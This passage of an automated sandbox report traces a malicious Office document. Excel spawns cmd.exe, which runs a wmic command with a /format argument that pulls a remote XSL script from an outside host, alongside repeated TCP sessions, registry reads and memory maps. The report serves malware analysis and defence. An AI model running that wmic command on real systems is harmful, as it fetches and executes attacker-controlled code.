Receive flags = NO_FLAG_SET, size = 1248, size_out = 1248 True 1 Fn, Data
Close type = SOCK_STREAM True 1 Fn
TCP Session #9
Information Value
Handle 0x7cc
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49701
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1 Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1 Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1 Fn, Data
Send flags = NO_FLAG_SET, size_out = 272 True 1 Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1 Fn, Data
Close type = SOCK_STREAM True 1 Fn
TCP Session #10
Information Value
Handle 0x7cc
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49701
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1 Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1 Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1 Fn, Data
Send flags = NO_FLAG_SET, size_out = 272 True 1 Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1 Fn, Data
Close type = SOCK_STREAM True 1 Fn
TCP Session #11
Information Value
Handle 0x7cc
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49701
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1 Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1 Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1 Fn, Data
Send flags = NO_FLAG_SET, size_out = 272 True 1 Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1 Fn, Data
Close type = SOCK_STREAM True 1 Fn
TCP Session #12
Information Value
Handle 0x7cc
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49701
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1 Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1 Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1 Fn, Data
Send flags = NO_FLAG_SET, size_out = 272 True 1 Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1 Fn, Data
Close type = SOCK_STREAM True 1 Fn
TCP Session #13
Information Value
Handle 0x7cc
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49701
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1 Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1 Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1 Fn, Data
Send flags = NO_FLAG_SET, size_out = 272 True 1 Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1 Fn, Data
Close type = SOCK_STREAM True 1 Fn
TCP Session #14
Information Value
Handle 0x7cc
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49701
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1 Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1 Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1 Fn, Data
Send flags = NO_FLAG_SET, size_out = 272 True 1 Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1 Fn, Data
Close type = SOCK_STREAM True 1 Fn
TCP Session #15
Information Value
Handle 0x7cc
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49701
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1 Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1 Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1 Fn, Data
Send flags = NO_FLAG_SET, size_out = 272 True 1 Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1 Fn, Data
Close type = SOCK_STREAM True 1 Fn
TCP Session #16
Information Value
Handle 0x7cc
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49701
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1 Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1 Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1 Fn, Data
Send flags = NO_FLAG_SET, size_out = 272 True 1 Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1 Fn, Data
Close type = SOCK_STREAM True 1 Fn
TCP Session #17
Information Value
Handle 0x7cc
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49701
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1 Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1 Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1 Fn, Data
Send flags = NO_FLAG_SET, size_out = 272 True 1 Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1 Fn, Data
Close type = SOCK_STREAM True 1 Fn
TCP Session #18
Information Value
Handle 0x7cc
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 162.243.19.12
Remote Port 443
Local Address 0.0.0.0
Local Port 49701
Data Sent 333 bytes
Data Received 1.57 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1 Fn
Connect remote_address = 162.243.19.12, remote_port = 443 True 1 Fn
Send flags = NO_FLAG_SET, size = 333, size_out = 333 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 49, size_out = 49 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 48, size_out = 48 True 1 Fn, Data
Send flags = NO_FLAG_SET, size_out = 272 True 1 Fn
Receive flags = NO_FLAG_SET, size = 5, size_out = 5 True 1 Fn, Data
Receive flags = NO_FLAG_SET, size = 1488, size_out = 1488 True 1 Fn, Data
Process #8: cmd.exe
Information Value
ID #8
File Name c:\windows\system32\cmd.exe
Command Line CMD.EXE /C wmic os get /format:"https://itaxkenya.com/kra/tax_returns.xsl"
Initial Working Directory C:\Users\Nd9E1FYi\Desktop\
Monitor Start Time: 00:01:50, Reason: Child Process
Unmonitor End Time: 00:10:40, Reason: Terminated by Timeout
Monitor Duration 00:08:50
OS Process Information
Information Value
PID 0xcd4
Parent PID 0xed8 (c:\program files\microsoft office\office16\excel.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username X2VS1CUM\Nd9E1FYi
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs 0xCE8, 0xBD4
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000183c600000 0x183c600000 0x183c7fffff Private Memory Readable, Writable True False False -
private_0x000000183c800000 0x183c800000 0x183c8fffff Private Memory Readable, Writable True False False -
private_0x000000183c900000 0x183c900000 0x183c9fffff Private Memory Readable, Writable True False False -
private_0x0000018a09850000 0x18a09850000 0x18a0986ffff Private Memory Readable, Writable True False False -
pagefile_0x0000018a09850000 0x18a09850000 0x18a0985ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000018a09860000 0x18a09860000 0x18a09866fff Private Memory Readable, Writable True False False -
pagefile_0x0000018a09870000 0x18a09870000 0x18a09884fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000018a09890000 0x18a09890000 0x18a09893fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000018a098a0000 0x18a098a0000 0x18a098a0fff Pagefile Backed Memory Readable True False False -
private_0x0000018a098b0000 0x18a098b0000 0x18a098b1fff Private Memory Readable, Writable True False False -
locale.nls 0x18a098c0000 0x18a0997dfff Memory Mapped File Readable False False False -
private_0x0000018a09980000 0x18a09980000 0x18a09a7ffff Private Memory Readable, Writable True False False -
private_0x0000018a09a80000 0x18a09a80000 0x18a09a86fff Private Memory Readable, Writable True False False -
private_0x0000018a09bf0000 0x18a09bf0000 0x18a09bfffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x18a09c00000 0x18a09f36fff Memory Mapped File Readable False False False -
pagefile_0x00007df5ff480000 0x7df5ff480000 0x7ff5ff47ffff Pagefile Backed Memory - True False False -
pagefile_0x00007ff648010000 0x7ff648010000 0x7ff64810ffff Pagefile Backed Memory Readable True False False -
pagefile_0x00007ff648110000 0x7ff648110000 0x7ff648132fff Pagefile Backed Memory Readable True False False -
cmd.exe 0x7ff649110000 0x7ff649169fff Memory Mapped File Readable, Writable, Executable True False False -
kernelbase.dll 0x7ffc14550000 0x7ffc14737fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x7ffc164b0000 0x7ffc1654cfff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x7ffc17120000 0x7ffc171ccfff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x7ffc17400000 0x7ffc175c0fff Memory Mapped File Readable, Writable, Executable False False False -
Host Behavior
File (7)
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\Nd9E1FYi\Desktop type = file_attributes True 2 Fn
Open STD_OUTPUT_HANDLE - True 3 Fn
Open STD_INPUT_HANDLE - True 2 Fn
Registry (17)
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1 Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1 Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1 Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1 Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1 Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1 Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1 Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1 Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1 Fn
Process (1)
Operation Process Additional Information Success Count Logfile
Create C:\Windows\System32\Wbem\WMIC.exe os_pid = 0x434, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1 Fn
Module (8)
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\cmd.exe base_address = 0x7ff649110000 True 1 Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x7ffc17120000 True 2 Fn
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\SYSTEM32\CMD.EXE, size = 260 True 1 Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x7ffc17143270 True 1 Fn
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x7ffc17148940 True 1 Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x7ffc17147460 True 1 Fn
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x7ffc145a6e50 True 1 Fn
Environment (15)
Operation Additional Information Success Count Logfile
Get Environment String - True 5 Fn, Data
Get Environment String name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 2 Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 2 Fn
Get Environment String name = PROMPT False 1 Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1 Fn
Get Environment String name = KEYS False 1 Fn
Set Environment String name = PROMPT, value = $P$G True 1 Fn
Set Environment String name = =C:, value = C:\Users\Nd9E1FYi\Desktop True 1 Fn
Set Environment String name = COPYCMD True 1 Fn
Process #10: wmic.exe
Information Value
ID #10
File Name c:\windows\system32\wbem\wmic.exe
Command Line wmic os get /format:"https://itaxkenya.com/kra/tax_returns.xsl"
Initial Working Directory C:\Users\Nd9E1FYi\Desktop\
Monitor Start Time: 00:01:50, Reason: Child Process
Unmonitor End Time: 00:10:40, Reason: Terminated by Timeout
Monitor Duration 00:08:50
OS Process Information
Information Value
PID 0x434
Parent PID 0xcd4 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username X2VS1CUM\Nd9E1FYi
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs 0x6BC, 0x740, 0xB84, 0xBC8, 0x47C, 0xA7C, 0xB40, 0xEBC, 0x888, 0x480, 0x454, 0xBD0, 0x90C, 0x2FC
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
msvcr80.dll 0x5cfe0000 0x5d0a8fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000d7edd10000 0xd7edd10000 0xd7edd8ffff Private Memory Readable, Writable True False False -
private_0x000000d7ede00000 0xd7ede00000 0xd7edffffff Private Memory Readable, Writable True False False -
private_0x000000d7ee000000 0xd7ee000000 0xd7ee07ffff Private Memory Readable, Writable True False False -
private_0x000000d7ee080000 0xd7ee080000 0xd7ee0fffff Private Memory Readable, Writable True False False -
private_0x000000d7ee100000 0xd7ee100000 0xd7ee17ffff Private Memory Readable, Writable True False False -
private_0x000000d7ee180000 0xd7ee180000 0xd7ee1fffff Private Memory Readable, Writable True False False -
private_0x000000d7ee200000 0xd7ee200000 0xd7ee27ffff Private Memory Readable, Writable True False False -
private_0x000000d7ee280000 0xd7ee280000 0xd7ee2fffff Private Memory Readable, Writable True False False -
private_0x000002ad20490000 0x2ad20490000 0x2ad204affff Private Memory Readable, Writable True False False -
pagefile_0x000002ad20490000 0x2ad20490000 0x2ad2049ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x000002ad204a0000 0x2ad204a0000 0x2ad204a6fff Private Memory Readable, Writable True False False -
pagefile_0x000002ad204b0000 0x2ad204b0000 0x2ad204c4fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002ad204d0000 0x2ad204d0000 0x2ad204d3fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002ad204e0000 0x2ad204e0000 0x2ad204e0fff Pagefile Backed Memory Readable True False False -
private_0x000002ad204f0000 0x2ad204f0000 0x2ad204f1fff Private Memory Readable, Writable True False False -
locale.nls 0x2ad20500000 0x2ad205bdfff Memory Mapped File Readable False False False -
private_0x000002ad205c0000 0x2ad205c0000 0x2ad205c6fff Private Memory Readable, Writable True False False -
private_0x000002ad205d0000 0x2ad205d0000 0x2ad206cffff Private Memory Readable, Writable True False False -
rpcss.dll 0x2ad206d0000 0x2ad207acfff Memory Mapped File Readable False False False -
pagefile_0x000002ad206d0000 0x2ad206d0000 0x2ad206d0fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002ad206e0000 0x2ad206e0000 0x2ad206e0fff Pagefile Backed Memory Readable True False False -
ole32.dll 0x2ad206f0000 0x2ad20832fff Memory Mapped File Readable False False False -
private_0x000002ad206f0000 0x2ad206f0000 0x2ad207bffff Private Memory Readable, Writable True False False -
private_0x000002ad206f0000 0x2ad206f0000 0x2ad2073ffff Private Memory Readable, Writable True False False -
pagefile_0x000002ad206f0000 0x2ad206f0000 0x2ad206f1fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002ad20700000 0x2ad20700000 0x2ad20700fff Pagefile Backed Memory Readable, Writable True False False -
msxml3r.dll 0x2ad20710000 0x2ad20710fff Memory Mapped File Readable False False False -
wmic.exe.mui 0x2ad20720000 0x2ad2072ffff Memory Mapped File Readable False False False -
private_0x000002ad20730000 0x2ad20730000 0x2ad2073ffff Private Memory Readable, Writable True False False -
private_0x000002ad20740000 0x2ad20740000 0x2ad2079ffff Private Memory Readable, Writable True False False -
private_0x000002ad20740000 0x2ad20740000 0x2ad2075ffff Private Memory - True False False -
private_0x000002ad20760000 0x2ad20760000 0x2ad20760fff Private Memory Readable, Writable True False False -
private_0x000002ad20770000 0x2ad20770000 0x2ad20770fff Private Memory Readable, Writable True False False -
pagefile_0x000002ad20780000 0x2ad20780000 0x2ad20780fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002ad20780000 0x2ad20780000 0x2ad20783fff Pagefile Backed Memory Readable True False False -
private_0x000002ad20790000 0x2ad20790000 0x2ad2079ffff Private Memory Readable, Writable True False False -
private_0x000002ad207a0000 0x2ad207a0000 0x2ad207a0fff Private Memory Readable, Writable True False False -
private_0x000002ad207b0000 0x2ad207b0000 0x2ad207bffff Private Memory Readable, Writable True False False -
private_0x000002ad207c0000 0x2ad207c0000 0x2ad2084ffff Private Memory Readable, Writable True False False -
private_0x000002ad207c0000 0x2ad207c0000 0x2ad2083ffff Private Memory Readable, Writable True False False -
imm32.dll 0x2ad207c0000 0x2ad207f8fff Memory Mapped File Readable False False False -
private_0x000002ad207c0000 0x2ad207c0000 0x2ad207effff Private Memory Readable, Writable True False False -
private_0x000002ad207c0000 0x2ad207c0000 0x2ad207c0fff Private Memory Readable, Writable True False False -
pagefile_0x000002ad207d0000 0x2ad207d0000 0x2ad207d0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x000002ad207e0000 0x2ad207e0000 0x2ad207effff Private Memory Readable, Writable True False False -
pagefile_0x000002ad207f0000 0x2ad207f0000 0x2ad2080ffff Pagefile Backed Memory Readable, Writable True False False -
counters.dat 0x2ad207f0000 0x2ad207f0fff Memory Mapped File Readable, Writable True False False -
pagefile_0x000002ad20800000 0x2ad20800000 0x2ad20800fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x000002ad20810000 0x2ad20810000 0x2ad2081ffff Pagefile Backed Memory Readable True False False -
private_0x000002ad20820000 0x2ad20820000 0x2ad20821fff Private Memory Readable, Writable True False False -
private_0x000002ad20820000 0x2ad20820000 0x2ad20826fff Private Memory Readable, Writable True False False -
private_0x000002ad20830000 0x2ad20830000 0x2ad2083ffff Private Memory Readable, Writable True False False -
private_0x000002ad20840000 0x2ad20840000 0x2ad2084ffff Private Memory Readable, Writable True False False -
pagefile_0x000002ad20850000 0x2ad20850000 0x2ad20850fff Pagefile Backed Memory Readable True False False -
private_0x000002ad20870000 0x2ad20870000 0x2ad2087ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x2ad20880000 0x2ad20bb6fff Memory Mapped File Readable False False False -
private_0x000002ad20bc0000 0x2ad20bc0000 0x2ad20d7ffff Private Memory Readable, Writable True False False -
private_0x000002ad20bc0000 0x2ad20bc0000 0x2ad20cdffff Private Memory Readable, Writable True False False -
kernelbase.dll.mui 0x2ad20bc0000 0x2ad20c9ffff Memory Mapped File Readable False False False -
private_0x000002ad20cd0000 0x2ad20cd0000 0x2ad20cdffff Private Memory Readable, Writable True False False -
private_0x000002ad20d70000 0x2ad20d70000 0x2ad20d7ffff Private Memory Readable, Writable True False False -
private_0x000002ad20d80000 0x2ad20d80000 0x2ad2117ffff Private Memory Readable, Writable True False False -
pagefile_0x000002ad21180000 0x2ad21180000 0x2ad21307fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002ad21310000 0x2ad21310000 0x2ad21490fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002ad214a0000 0x2ad214a0000 0x2ad2289ffff Pagefile Backed Memory Readable True False False -
pagefile_0x000002ad228a0000 0x2ad228a0000 0x2ad2295bfff Pagefile Backed Memory Readable True False False -
rpcss.dll 0x2ad22960000 0x2ad22a3cfff Memory Mapped File Readable False False False -
private_0x000002ad22960000 0x2ad22960000 0x2ad22a5ffff Private Memory Readable, Writable True False False -
private_0x000002ad22a60000 0x2ad22a60000 0x2ad22b5ffff Private Memory Readable, Writable True False False -
private_0x000002ad22b60000 0x2ad22b60000 0x2ad22c5ffff Private Memory Readable, Writable True False False -
private_0x000002ad22c60000 0x2ad22c60000 0x2ad22d5ffff Private Memory Readable, Writable True False False -
pagefile_0x000002ad22d60000 0x2ad22d60000 0x2ad2315afff Pagefile Backed Memory Readable True False False -
private_0x000002ad23230000 0x2ad23230000 0x2ad2323ffff Private Memory Readable, Writable, Executable True False False -
private_0x000002ad23250000 0x2ad23250000 0x2ad2325ffff Private Memory Readable, Writable True False False -
pagefile_0x00007df5ffb60000 0x7df5ffb60000 0x7ff5ffb5ffff Pagefile Backed Memory - True False False -
pagefile_0x00007ff66e290000 0x7ff66e290000 0x7ff66e38ffff Pagefile Backed Memory Readable True False False -
pagefile_0x00007ff66e390000 0x7ff66e390000 0x7ff66e3b2fff Pagefile Backed Memory Readable True False False -
wmic.exe 0x7ff66e670000 0x7ff66e6f1fff Memory Mapped File Readable, Writable, Executable True False False -
jscript.dll 0x7ffbf6140000 0x7ffbf6207fff Memory Mapped File Readable, Writable, Executable True False False -
amsi.dll 0x7ffbf68c0000 0x7ffbf68cffff Memory Mapped File Readable, Writable, Executable False False False -
wmi2xml.dll 0x7ffbf7780000 0x7ffbf779bfff Memory Mapped File Readable, Writable, Executable False False False -
msoxmlmf.dll 0x7ffbf77c0000 0x7ffbf77d2fff Memory Mapped File Readable, Writable, Executable False False False -
mscoreei.dll 0x7ffbf8a40000 0x7ffbf8ad7fff Memory Mapped File Readable, Writable, Executable True False False -
mscoree.dll 0x7ffbf8ae0000 0x7ffbf8b47fff Memory Mapped File Readable, Writable, Executable True False False -
